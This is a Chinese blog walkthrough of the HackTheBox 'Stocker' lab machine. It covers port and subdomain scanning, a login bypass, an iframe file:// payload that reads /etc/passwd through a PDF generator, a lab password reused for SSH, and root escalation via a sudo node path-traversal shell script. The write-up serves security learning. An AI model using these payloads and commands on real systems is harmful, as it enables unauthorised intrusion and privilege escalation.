Stocker 靶机

信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.196
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-07 21:34 EDT
Warning: 10.10.11.196 giving up on port because retransmission cap hit (10).
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.037s latency).
Not shown: 64550 closed tcp ports (reset), 983 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 30.17 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p22,80 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-07 21:36 EDT
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.0044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Stock - Coming Soon!
|_http-generator: Eleventy v2.0.0
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-07 21:37 EDT
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.0036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  BID:49303  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://www.securityfocus.com/bid/49303
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.tenable.com/plugins/nessus/55976
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 76.35 seconds

获得的信息：开放了 22 和 80 端口，没有明显的漏洞信息，大概率是 Linux 服务系统，实际上 nmap 扫描 80 端口时会获得的 title 是被重定向到了 stocker.htb 域名，修改 hosts 文件后，访问才会正常（之所以有这种设置，是因为一个 IP 可能绑定了多个域名）

Web 渗透

网站信息收集

接下来我尝试了目录爆破、网页源代码查看、证书查看、cookie 查看，这个页面里似乎没有可以利用的信息

子域名爆破

接下来只能考虑子域名了（犹豫，看了 WP 才确定）

┌──(i3eg1nner㉿minilite)-[~]
└─$ wfuzz --hc 301 -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "HOST: FUZZ.stocker.htb" http://stocker.htb/
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz\'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://stocker.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000019:   302        0 L      4 W        28 Ch       "dev - dev"

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0

wfuzz 比想象中得好用，找时间看看它的使用技巧。这里拿到了子域名前缀 dev，修改 hosts 文件将其也添加进去，然后访问子域名，得到了登录界面

node 注入

登录界面中没有明显的利用点，尝试 SQL 注入似乎也无效，这里一下子有点没头绪。

拿到了一些网页架构的信息，尝试搜索搜索吧

似乎的确有可以利用的地方，尝试了一些方法，json 格式似乎会被解析，但是没法直接利用，只能继续搜索

从上往下翻，没找到什么可以利用的地方……

GitHub 中的这个项目开发了一个有漏洞的 nodejs web app，里面提到了一种注入攻击

尝试之后发现可行

那就修改后让流量通过

得到如下界面

好像是个购物界面，尝试加入购物车，然后点击下单

链接点进去是个 pdf

尝试 burp 抓包，然后修改一些字段试试

话说既然可以这样修改，岂不是可以零元购（不是

Skia/PDF 漏洞

到这里又没什么思路了，尝试了测试是否存在本地文件包含，无效，代码执行的话，这里只用了字符串，尝试后预期内无效，看了眼 WP，给出的思路是下载下来看这个文件的信息（

┌──(kali㉿kali)-[~/Downloads]
└─$ exiftool document.pdf                           
ExifTool Version Number         : 12.57
File Name                       : document.pdf
Directory                       : .
File Size                       : 42 kB
File Modification Date/Time     : 2023:06:07 22:47:24-04:00
File Access Date/Time           : 2023:06:07 22:48:00-04:00
File Inode Change Date/Time     : 2023:06:07 22:47:41-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2023:06:08 02:43:35+00:00
Modify Date                     : 2023:06:08 02:43:35+00:00
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Downloads]
└─$ binwalk document.pdf 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PDF document, version: "1.4"
390           0x186           Zlib compressed data, default compression
10980         0x2AE4          Zlib compressed data, default compression
26950         0x6946          Zlib compressed data, default compression
27517         0x6B7D          Zlib compressed data, default compression
39333         0x99A5          Zlib compressed data, default compression

需要特别关注的是，这里给出了 Producer，搜一搜存不存在漏洞利用

尝试构造一下 payload："title":"<iframe src=file:///etc/passwd width=800 height=1050 > ", 这里高和宽的选择是要经过慢慢测试的，当 height 过高时无法显示，太低了就显示不全文件

angoose 用户有 bash 权限

配置文件读取

尝试读取 shadow 文件，不出所料读取不了，那就只能考虑读取一些配置文件了，nginx 的配置文件经过搜索发现位于/etc/nginx/nginx.conf

也只得到了一个所在路径，尝试得到报错信息

尝试读取上述路径文件，但是没什么信息，继续看 WP，目标文件原来在/var/ www/dev路径下，名字是 index.js

有一串特殊的字符串，给出了 dev 用户的密码 dev:IHeardPassphrasesArePrettySecure，尝试是否可以通过这个密码进行 ssh 登录

┌──(i3eg1nner㉿minilite)-[~]
└─$ ssh angoose@10.10.11.196
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password:
Last login: Wed Jun  7 12:32:14 2023 from 10.10.16.30
angoose@stocker:~$ pwd
/home/angoose
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt

angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js
angoose@stocker:~$ echo "require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})" > /usr/local/scripts/shell.js
-bash: /usr/local/scripts/shell.js: Permission denied
angoose@stocker:~$ ls -liah /usr/local/scripts/
total 32K
64592 drwxr-xr-x  3 root root 4.0K Dec  6  2022 .
56194 drwxr-xr-x 11 root root 4.0K Dec  6  2022 ..
64593 -rwxr-x--x  1 root root  245 Dec  6  2022 creds.js
64594 -rwxr-x--x  1 root root 1.6K Dec  6  2022 findAllOrders.js
64595 -rwxr-x--x  1 root root  793 Dec  6  2022 findUnshippedOrders.js
64598 drwxr-xr-x  2 root root 4.0K Dec  6  2022 node_modules
64596 -rwxr-x--x  1 root root 1.4K Dec  6  2022 profitThisMonth.js
64597 -rwxr-x--x  1 root root  623 Dec  6  2022 schema.js
angoose@stocker:~$ touch shell.js
angoose@stocker:~$ echo "require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})" > /usr/local/scripts/shell.js
-bash: /usr/local/scripts/shell.js: Permission denied

node 提权

这次的提权比较简单，sudo -l 给出了明显的线索，可以使用 node 命令执行 js 文件，尝试在那个目录下写入文件，失败。应该是没有权限，不过感觉可以通过 ../ 来绕过

angoose@stocker:~$ echo "require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})" > shell.js
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/shell.js
/home/angoose/shell.js:1
require(child_process).spawn(/bin/sh, {stdio: [0, 1, 2]})
                             ^

SyntaxError: Invalid regular expression flags
    at Object.compileFunction (node:vm:360:18)
    at wrapSafe (node:internal/modules/cjs/loader:1088:15)
    at Module._compile (node:internal/modules/cjs/loader:1123:27)
    at Module._extensions..js (node:internal/modules/cjs/loader:1213:10)
    at Module.load (node:internal/modules/cjs/loader:1037:32)
    at Module._load (node:internal/modules/cjs/loader:878:12)
    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:81:12)
    at node:internal/main/run_main_module:23:47

Node.js v18.12.1
angoose@stocker:~$ whoami
angoose
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ echo 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})' > shell.js
angoose@stocker:~$ cat shell.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/shell.js
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt

knowledge_database > hackthebox

Stocker靶机

https://i3eg1nner.github.io/2023/06/9690503462f3.html

作者

I3eg1nner

发布于

2023年6月8日

许可协议

Narak靶机上一篇

Soccer靶机下一篇